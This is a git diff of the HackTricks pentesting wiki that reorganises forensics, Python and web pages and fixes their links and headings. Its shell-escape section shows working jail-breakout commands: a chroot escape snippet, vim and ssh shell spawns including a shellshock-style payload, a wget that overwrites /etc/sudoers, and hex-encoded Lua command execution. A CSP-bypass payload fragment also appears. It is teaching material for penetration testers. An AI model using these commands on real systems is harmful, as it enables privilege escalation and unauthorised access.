rename from generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md
rename to forensics/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md
index cd0e701a6..e2aea9216 100644
--- a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md
+++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md
@@ -1,4 +1,4 @@
-
+# PDF File analysis
@@ -16,7 +16,6 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
From: [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/)
PDF is an extremely complicated document file format, with enough tricks and hiding places [to write about for years](https://www.sultanik.com/pocorgtfo/). This also makes it popular for CTF forensics challenges. The NSA wrote a guide to these hiding places in 2008 titled "Hidden Data and Metadata in Adobe PDF Files: Publication Risks and Countermeasures." It's no longer available at its original URL, but you can [find a copy here](http://www.itsecure.hu/library/file/Biztons%C3%A1gi%20%C3%BAtmutat%C3%B3k/Alkalmaz%C3%A1sok/Hidden%20Data%20and%20Metadata%20in%20Adobe%20PDF%20Files.pdf). Ange Albertini also keeps a wiki on GitHub of [PDF file format tricks](https://github.com/corkami/docs/blob/master/PDF/PDF.md).
@@ -37,10 +36,6 @@ When exploring PDF content for hidden data, some of the hiding places to check i
There are also several Python packages for working with the PDF file format, like [PeepDF](https://github.com/jesparza/peepdf), that enable you to write your own parsing scripts.
-
-
-
-
Support HackTricks and get benefits!
@@ -56,5 +51,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md
similarity index 99%
rename from generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md
rename to forensics/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md
index ce05a6dbf..0b43879b9 100644
--- a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md
+++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md
@@ -1,4 +1,4 @@
-
+# PNG tricks
@@ -16,13 +16,10 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
PNG files, in particular, are popular in CTF challenges, probably for their lossless compression suitable for hiding non-visual data in the image. PNG files can be dissected in Wireshark. To verify correcteness or attempt to repair corrupted PNGs you can use [pngcheck](http://libpng.org/pub/png/apps/pngcheck.html)
You can try to repair corrupted PNGs using online tools like: [https://online.officerecovery.com/pixrecovery/](https://online.officerecovery.com/pixrecovery/)
-
-
Support HackTricks and get benefits!
@@ -38,5 +35,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md
similarity index 70%
rename from generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md
rename to forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md
index 8dbc69d81..32e7af118 100644
--- a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md
+++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md
@@ -1,4 +1,4 @@
-
+# Video and Audio file analysis
@@ -16,20 +16,17 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
From: [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/)
-Like image file formats, audio and video file trickery is a common theme in CTF forensics challenges not because hacking or data hiding ever happens this way in the real world, but just because audio and video is fun. As with image file formats, stegonagraphy might be used to embed a secret message in the content data, and again you should know to check the file metadata areas for clues. Your first step should be to take a look with the [mediainfo](https://mediaarea.net/en/MediaInfo) tool \(or `exiftool`\) and identify the content type and look at its metadata.
+Like image file formats, audio and video file trickery is a common theme in CTF forensics challenges not because hacking or data hiding ever happens this way in the real world, but just because audio and video is fun. As with image file formats, stegonagraphy might be used to embed a secret message in the content data, and again you should know to check the file metadata areas for clues. Your first step should be to take a look with the [mediainfo](https://mediaarea.net/en/MediaInfo) tool (or `exiftool`) and identify the content type and look at its metadata.
-[Audacity](http://www.audacityteam.org/) is the premiere open-source audio file and waveform-viewing tool, and CTF challenge authors love to encode text into audio waveforms, which you can see using the spectogram view \(although a specialized tool called [Sonic Visualiser](http://www.sonicvisualiser.org/) is better for this task in particular\). Audacity can also enable you to slow down, reverse, and do other manipulations that might reveal a hidden message if you suspect there is one \(if you can hear garbled audio, interference, or static\). [Sox](http://sox.sourceforge.net/) is another useful command-line tool for converting and manipulating audio files.
+[Audacity](http://www.audacityteam.org) is the premiere open-source audio file and waveform-viewing tool, and CTF challenge authors love to encode text into audio waveforms, which you can see using the spectogram view (although a specialized tool called [Sonic Visualiser](http://www.sonicvisualiser.org) is better for this task in particular). Audacity can also enable you to slow down, reverse, and do other manipulations that might reveal a hidden message if you suspect there is one (if you can hear garbled audio, interference, or static). [Sox](http://sox.sourceforge.net) is another useful command-line tool for converting and manipulating audio files.
-It's also common to check least-significant-bits \(LSB\) for a secret message. Most audio and video media formats use discrete \(fixed-size\) "chunks" so that they can be streamed; the LSBs of those chunks are a common place to smuggle some data without visibly affecting the file.
+It's also common to check least-significant-bits (LSB) for a secret message. Most audio and video media formats use discrete (fixed-size) "chunks" so that they can be streamed; the LSBs of those chunks are a common place to smuggle some data without visibly affecting the file.
Other times, a message might be encoded into the audio as [DTMF tones](http://dialabc.com/sound/detect/index.html) or morse code. For these, try working with [multimon-ng](http://tools.kali.org/wireless-attacks/multimon-ng) to decode them.
-Video file formats are really container formats, that contain separate streams of both audio and video that are multiplexed together for playback. For analyzing and manipulating video file formats, [ffmpeg](http://ffmpeg.org/) is recommended. `ffmpeg -i` gives initial analysis of the file content. It can also de-multiplex or playback the content streams. The power of ffmpeg is exposed to Python using [ffmpy](http://ffmpy.readthedocs.io/en/latest/examples.html).
-
-
+Video file formats are really container formats, that contain separate streams of both audio and video that are multiplexed together for playback. For analyzing and manipulating video file formats, [ffmpeg](http://ffmpeg.org) is recommended. `ffmpeg -i` gives initial analysis of the file content. It can also de-multiplex or playback the content streams. The power of ffmpeg is exposed to Python using [ffmpy](http://ffmpy.readthedocs.io/en/latest/examples.html).
@@ -46,5 +43,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md
similarity index 99%
rename from generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md
rename to forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md
index 667d501a9..8e0b44a74 100644
--- a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md
+++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md
@@ -1,4 +1,4 @@
-
+# ZIPs tricks
@@ -16,7 +16,6 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
There are a handful of command-line tools for zip files that will be useful to know about.
* `unzip` will often output helpful information on why a zip will not decompress.
@@ -33,7 +32,6 @@ Another note about zip cracking is that if you have an unencrypted/uncompressed
From: [https://app.gitbook.com/@cpol/s/hacktricks/\~/edit/drafts/-LlM5mCby8ex5pOeV4pJ/forensics/basic-forensics-esp/zips-tricks](https://app.gitbook.com/s/-L\_2uGJGU7AVNRcqRvEi/)
-
Support HackTricks and get benefits!
@@ -49,5 +47,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/README.md b/forensics/basic-forensic-methodology/windows-forensics/README.md
similarity index 100%
rename from generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/README.md
rename to forensics/basic-forensic-methodology/windows-forensics/README.md
diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md b/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md
similarity index 100%
rename from generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md
rename to forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md
diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/windows-processes.md b/forensics/basic-forensic-methodology/windows-forensics/windows-processes.md
similarity index 96%
rename from generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/windows-processes.md
rename to forensics/basic-forensic-methodology/windows-forensics/windows-processes.md
index 815ad67bc..d8a42d7c7 100644
--- a/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/windows-processes.md
+++ b/forensics/basic-forensic-methodology/windows-forensics/windows-processes.md
@@ -1,4 +1,4 @@
-
+# Windows Processes
@@ -16,21 +16,20 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-## smss.exe
+### smss.exe
It's called **Session Manager**.\
Session 0 starts **csrss.exe** and **wininit.exe** (**OS** **services**) while Session 1 starts **csrss.exe** and **winlogon.exe** (**User** **session**). However, you should see **only one process** of that **binary** without children in the processes tree.\
Also, more sessions apart from 0 and 1 may mean that RDP sessions are occurring.
-## csrss.exe
+### csrss.exe
Is the **Client/Server Run Subsystem Process**.\
It manages **processes** and **threads**, makes the **Windows** **API** available for other processes and also **maps** **drive** **letters**, create **temp** **files** and handles the **shutdown** **process**.\
There is one **running in Session 0 and another one in Session 1** (so **2 processes** in the processes tree).\
Another one is created **per new Session**.
-## winlogon.exe
+### winlogon.exe
This is Windows Logon Process.\
It's responsible for user **logon**/**logoffs**.\
@@ -38,24 +37,24 @@ It launches **logonui.exe** to ask for username and password and then calls **ls
Then it launches **userinit.exe** which is specified in **`HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon`** with key **Userinit**.\
Mover over, the previous registry should have **explorer.exe** in the **Shell key** or it might be abused as a **malware persistence method**.
-## wininit.exe
+### wininit.exe
This is the **Windows Initialization Process**. It launches **services.exe**, **lsass.exe** and **lsm.exe** in Session 0.\
There should only be 1 process.
-## userinit.exe
+### userinit.exe
Load the **ntduser.dat in HKCU** and initialises the **user** **environment** and runs **logon** **scripts** and **GPO**.\
It launches **explorer.exe**.
-## lsm.exe
+### lsm.exe
This is the **Local Session Manager**.\
It works with smss.exe to manipulate use sessions: Logon/logoff, shell start, lock/unlock desktop...\
After W7 lsm.exe was transformed into a service (lsm.dll).\
There should only be 1 process in W7 and from them a service running the DLL.
-## services.exe
+### services.exe
This is the **Service Control Manager**.\
It **loads** **services** configured as **auto-start** and **drivers**.
@@ -67,7 +66,7 @@ Note how **some** **services** are going to be running in a **process of their o
There should only be 1 process.
-## lsass.exe
+### lsass.exe
This the **Local Security Authority Subsystem**.\
It's responsible for the user **authentication** and create the **security** **tokens**. It uses authentication packages located in `HKLM\System\CurrentControlSet\Control\Lsa`.\
@@ -75,7 +74,7 @@ It writes to the **Security** **event** **log**.\
There should only be 1 process.\
Keep in mind that this process is highly attacked to dump passwords.
-## svchost.exe
+### svchost.exe
This is the **Generic Service Host Process**.\
It hosts multiple DLL services in one shared process.\
@@ -87,18 +86,18 @@ If the **flag `-s`** is also used with an argument, then svchost is asked to **o
There will be several process of `svchost.exe`. If any of them is **not using the `-k` flag**, then thats very suspicious. If you find that **services.exe is not the parent**, thats also very suspicious.
-## taskhost.exe
+### taskhost.exe
This process act as host for processes run from DLLs. It loads the services that are run from DLLs.\
In W8 is called taskhostex.exe and in W10 taskhostw.exe.
-## explorer.exe
+### explorer.exe
This is the process responsible for the **user's desktop** and launching files via file extensions.\
**Only 1** process should be spawned **per logged on user.**\
This is run from **userinit.exe** which should be terminated, so **no parent** should appear for this process.
-# Catching Malicious Processes
+## Catching Malicious Processes
* Is it running from the expected path? (No Windows binaries run from temp location)
* Is it communicating with weird IPs?
@@ -108,7 +107,6 @@ This is run from **userinit.exe** which should be terminated, so **no parent** s
* Is the parent process the expected one (if any)?
* Are the children processes the expecting ones? (no cmd.exe, wscript.exe, powershell.exe..?)
-
Support HackTricks and get benefits!
@@ -124,5 +122,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
diff --git a/misc/basic-python/README.md b/generic-methodologies-and-resources/basic-python/README.md
similarity index 100%
rename from misc/basic-python/README.md
rename to generic-methodologies-and-resources/basic-python/README.md
diff --git a/misc/basic-python/bruteforce-hash-few-chars.md b/generic-methodologies-and-resources/basic-python/bruteforce-hash-few-chars.md
similarity index 100%
rename from misc/basic-python/bruteforce-hash-few-chars.md
rename to generic-methodologies-and-resources/basic-python/bruteforce-hash-few-chars.md
diff --git a/misc/basic-python/bypass-python-sandboxes/README.md b/generic-methodologies-and-resources/basic-python/bypass-python-sandboxes/README.md
similarity index 99%
rename from misc/basic-python/bypass-python-sandboxes/README.md
rename to generic-methodologies-and-resources/basic-python/bypass-python-sandboxes/README.md
index 45a476152..702e70705 100644
--- a/misc/basic-python/bypass-python-sandboxes/README.md
+++ b/generic-methodologies-and-resources/basic-python/bypass-python-sandboxes/README.md
@@ -861,8 +861,8 @@ Using tools like [**https://www.decompiler.com/**](https://www.decompiler.com) o
**Check out this tutorial**:
-{% content-ref url="../../../generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md" %}
-[.pyc.md](../../../generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md)
+{% content-ref url="../../../forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md" %}
+[.pyc.md](../../../forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md)
{% endcontent-ref %}
## Misc Python
diff --git a/misc/basic-python/bypass-python-sandboxes/output-searching-python-internals.md b/generic-methodologies-and-resources/basic-python/bypass-python-sandboxes/output-searching-python-internals.md
similarity index 100%
rename from misc/basic-python/bypass-python-sandboxes/output-searching-python-internals.md
rename to generic-methodologies-and-resources/basic-python/bypass-python-sandboxes/output-searching-python-internals.md
diff --git a/misc/basic-python/magic-methods.md b/generic-methodologies-and-resources/basic-python/magic-methods.md
similarity index 100%
rename from misc/basic-python/magic-methods.md
rename to generic-methodologies-and-resources/basic-python/magic-methods.md
diff --git a/misc/basic-python/venv.md b/generic-methodologies-and-resources/basic-python/venv.md
similarity index 100%
rename from misc/basic-python/venv.md
rename to generic-methodologies-and-resources/basic-python/venv.md
diff --git a/misc/basic-python/web-requests.md b/generic-methodologies-and-resources/basic-python/web-requests.md
similarity index 100%
rename from misc/basic-python/web-requests.md
rename to generic-methodologies-and-resources/basic-python/web-requests.md
diff --git a/generic-methodologies-and-resources/pentesting-methodology.md b/generic-methodologies-and-resources/pentesting-methodology.md
index 59beaa055..80786acb7 100644
--- a/generic-methodologies-and-resources/pentesting-methodology.md
+++ b/generic-methodologies-and-resources/pentesting-methodology.md
@@ -36,7 +36,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
### 0- Physical Attacks
-Do you have **physical access** to the machine that you want to attack? You should read some [**tricks about physical attacks**](../hardware-physical-access/physical-attacks.md) and others about [**escaping from GUI applications**](../hardware-physical-access/escaping-from-gui-applications/).
+Do you have **physical access** to the machine that you want to attack? You should read some [**tricks about physical attacks**](../physical-attacks/physical-attacks.md) and others about [**escaping from GUI applications**](../physical-attacks/escaping-from-gui-applications/).
### 1 - [Discovering hosts inside the network ](pentesting-network/#discovering-hosts)/ [Discovering Assets of the company](external-recon-methodology/)
@@ -146,17 +146,17 @@ Check also the page about [**NTLM**](../windows-hardening/ntlm/), it could be ve
#### **Exploiting**
-* [**Basic Linux Exploiting**](../group-1/linux-exploiting-basic-esp/)
-* [**Basic Windows Exploiting**](../group-1/windows-exploiting-basic-guide-oscp-lvl.md)
-* [**Basic exploiting tools**](../group-1/tools/)
+* [**Basic Linux Exploiting**](../reversing-and-exploiting/linux-exploiting-basic-esp/)
+* [**Basic Windows Exploiting**](../reversing-and-exploiting/windows-exploiting-basic-guide-oscp-lvl.md)
+* [**Basic exploiting tools**](../reversing-and-exploiting/tools/)
-#### [**Basic Python**](../misc/basic-python/)
+#### [**Basic Python**](basic-python/)
#### **Crypto tricks**
-* [**ECB**](../cryptography/electronic-code-book-ecb.md)
-* [**CBC-MAC**](../cryptography/cipher-block-chaining-cbc-mac-priv.md)
-* [**Padding Oracle**](../cryptography/padding-oracle-priv.md)
+* [**ECB**](../crypto-and-stego/electronic-code-book-ecb.md)
+* [**CBC-MAC**](../crypto-and-stego/cipher-block-chaining-cbc-mac-priv.md)
+* [**Padding Oracle**](../crypto-and-stego/padding-oracle-priv.md)
diff --git a/group-1/reversing-and-exploiting.md b/group-1/reversing-and-exploiting.md
deleted file mode 100644
index 7ebfeeb81..000000000
--- a/group-1/reversing-and-exploiting.md
+++ /dev/null
@@ -1,2 +0,0 @@
-# Reversing & Exploiting
-
diff --git a/linux-hardening/privilege-escalation/escaping-from-limited-bash.md b/linux-hardening/privilege-escalation/escaping-from-limited-bash.md
index 2816fe0e5..456ceb7e8 100644
--- a/linux-hardening/privilege-escalation/escaping-from-limited-bash.md
+++ b/linux-hardening/privilege-escalation/escaping-from-limited-bash.md
@@ -1,4 +1,4 @@
-
+# Escaping from Jails
@@ -16,14 +16,13 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-# **GTFOBins**
+## **GTFOBins**
**Search in** [**https://gtfobins.github.io/**](https://gtfobins.github.io) **if you can execute any binary with "Shell" property**
-# Chroot limitation
+## Chroot limitation
-From [wikipedia](https://en.wikipedia.org/wiki/Chroot#Limitations): The chroot mechanism is **not intended to defend** against intentional tampering by **privileged** (**root**) **users**. On most systems, chroot contexts do not stack properly and chrooted programs **with sufficient privileges may perform a second chroot to break out**.
+From [wikipedia](https://en.wikipedia.org/wiki/Chroot#Limitations): The chroot mechanism is **not intended to defend** against intentional tampering by **privileged** (**root**) **users**. On most systems, chroot contexts do not stack properly and chrooted programs **with sufficient privileges may perform a second chroot to break out**.
Therefore, if you are **root** inside a chroot you **can escape** creating **another chroot**. However, in several cases inside the first chroot you won't be able to execute the chroot command, therefore you will need to compile a binary like the following one and run it:
@@ -74,9 +73,9 @@ chroot ".";
system("/bin/bash");
```
-# Bash Jails
+## Bash Jails
-## Enumeration
+### Enumeration
Get info about the jail:
@@ -88,7 +87,7 @@ export
pwd
```
-## Modify PATH
+### Modify PATH
Check if you can modify the PATH env variable
@@ -98,14 +97,14 @@ PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin #Try to change
echo /home/* #List directory
```
-## Using vim
+### Using vim
```bash
:set shell=/bin/sh
:shell
```
-## Create script
+### Create script
Check if you can create an executable file with _/bin/bash_ as content
@@ -114,7 +113,7 @@ red /bin/bash
> w wx/path #Write /bin/bash in a writable and executable path
```
-## Get bash from SSH
+### Get bash from SSH
If you are accessing via ssh you can use this trick to execute a bash shell:
@@ -124,7 +123,7 @@ ssh user@ -t "bash --noprofile -i"
ssh user@ -t "() { :; }; sh -i "
```
-## Declare
+### Declare
```bash
declare -n PATH; export PATH=/bin;bash -i
@@ -132,7 +131,7 @@ declare -n PATH; export PATH=/bin;bash -i
BASH_CMDS[shell]=/bin/bash;shell -i
```
-## Wget
+### Wget
You can overwrite for example sudoers file
@@ -140,30 +139,30 @@ You can overwrite for example sudoers file
wget http://127.0.0.1:8080/sudoers -O /etc/sudoers
```
-## Other tricks
+### Other tricks
[**https://fireshellsecurity.team/restricted-linux-shell-escaping-techniques/**](https://fireshellsecurity.team/restricted-linux-shell-escaping-techniques/)\
-[https://pen-testing.sans.org/blog/2012/0**b**6/06/escaping-restricted-linux-shells](https://pen-testing.sans.org/blog/2012/06/06/escaping-restricted-linux-shells**]\(https://pen-testing.sans.org/blog/2012/06/06/escaping-restricted-linux-shells)\
-[https://gtfobins.github.io](https://gtfobins.github.io/**]\(https/gtfobins.github.io)\
+[https://pen-testing.sans.org/blog/2012/0**b**6/06/escaping-restricted-linux-shells](https://pen-testing.sans.org/blog/2012/06/06/escaping-restricted-linux-shells\*\*]\(https://pen-testing.sans.org/blog/2012/06/06/escaping-restricted-linux-shells)\
+[https://gtfobins.github.io](https://gtfobins.github.io/\*\*]\(https/gtfobins.github.io)\
**It could also be interesting the page:**
{% content-ref url="../useful-linux-commands/bypass-bash-restrictions.md" %}
[bypass-bash-restrictions.md](../useful-linux-commands/bypass-bash-restrictions.md)
{% endcontent-ref %}
-# Python Jails
+## Python Jails
Tricks about escaping from python jails in the following page:
-{% content-ref url="../../misc/basic-python/bypass-python-sandboxes/" %}
-[bypass-python-sandboxes](../../misc/basic-python/bypass-python-sandboxes/)
+{% content-ref url="../../generic-methodologies-and-resources/basic-python/bypass-python-sandboxes/" %}
+[bypass-python-sandboxes](../../generic-methodologies-and-resources/basic-python/bypass-python-sandboxes/)
{% endcontent-ref %}
-# Lua Jails
+## Lua Jails
In this page you can find the global functions you have access to inside lua: [https://www.gammon.com.au/scripts/doc.php?general=lua\_base](https://www.gammon.com.au/scripts/doc.php?general=lua\_base)
-**Eval** with command execution**:**
+**Eval** with command execution\*\*:\*\*
```bash
load(string.char(0x6f,0x73,0x2e,0x65,0x78,0x65,0x63,0x75,0x74,0x65,0x28,0x27,0x6c,0x73,0x27,0x29))()
@@ -201,8 +200,6 @@ for i in seq 1000; do echo "for k1,chr in pairs(string) do for k2,exec in pairs(
debug.debug()
```
-
-
Support HackTricks and get benefits!
@@ -218,5 +215,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
diff --git a/mobile-pentesting/android-app-pentesting/README.md b/mobile-pentesting/android-app-pentesting/README.md
index c3d5dd82d..4fa152e50 100644
--- a/mobile-pentesting/android-app-pentesting/README.md
+++ b/mobile-pentesting/android-app-pentesting/README.md
@@ -202,7 +202,7 @@ Then, decompress all the DLsL using [**xamarin-decompress**](https://github.com/
python3 xamarin-decompress.py -o /path/to/decompressed/apk
```
-and finally you can use [**these recommended tools**](../../group-1/reversing-tools-basic-methods/#net-decompiler) to **read C# code** from the DLLs.
+and finally you can use [**these recommended tools**](../../reversing-and-exploiting/reversing-tools-basic-methods/#net-decompiler) to **read C# code** from the DLLs.
### Automated Static Code Analysis
diff --git a/network-services-pentesting/pentesting-web/python.md b/network-services-pentesting/pentesting-web/python.md
index b10d1f961..6d7c7413b 100644
--- a/network-services-pentesting/pentesting-web/python.md
+++ b/network-services-pentesting/pentesting-web/python.md
@@ -1,4 +1,4 @@
-
+# Python
@@ -16,24 +16,27 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+## Server using python
-# Server using python
-
-test a possible **code execution**, using the function _str\(\)_:
+test a possible **code execution**, using the function _str()_:
```python
"+str(True)+" #If the string True is printed, then it is vulnerable
```
-## Tricks
+### Tricks
-{% page-ref page="../../misc/basic-python/bypass-python-sandboxes/" %}
-
-{% page-ref page="../../pentesting-web/ssti-server-side-template-injection/" %}
-
-{% page-ref page="../../pentesting-web/deserialization/" %}
+{% content-ref url="../../generic-methodologies-and-resources/basic-python/bypass-python-sandboxes/" %}
+[bypass-python-sandboxes](../../generic-methodologies-and-resources/basic-python/bypass-python-sandboxes/)
+{% endcontent-ref %}
+{% content-ref url="../../pentesting-web/ssti-server-side-template-injection/" %}
+[ssti-server-side-template-injection](../../pentesting-web/ssti-server-side-template-injection/)
+{% endcontent-ref %}
+{% content-ref url="../../pentesting-web/deserialization/" %}
+[deserialization](../../pentesting-web/deserialization/)
+{% endcontent-ref %}
@@ -50,5 +53,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
diff --git a/pentesting-web/content-security-policy-csp-bypass/README.md b/pentesting-web/content-security-policy-csp-bypass/README.md
index 1d8c44198..c988408ad 100644
--- a/pentesting-web/content-security-policy-csp-bypass/README.md
+++ b/pentesting-web/content-security-policy-csp-bypass/README.md
@@ -218,7 +218,7 @@ Online Example:[ ](https://jsbin.com/werevijewa/edit?html,output)[https://jsbin.
### missing **base-uri**
-If the **base-uri** directive is missing you can abuse it to perform a [**dangling markup injection**](../dangling-markup-html-scriptless-injection/).
+If the **base-uri** directive is missing you can abuse it to perform a [**dangling markup injection**](../dangling-markup-html-scriptless-injection.md).
Moreover, if the **page is loading a script using a relative path** (like `/js/app.js`) using a **Nonce**, you can abuse the **base** **tag** to make it **load** the script from **your own server achieving a XSS.**\
If the vulnerable page is loaded with **httpS**, make use a httpS url in the base.
@@ -255,7 +255,7 @@ ng-app"ng-csp ng-click=$event.view.alert(1337)>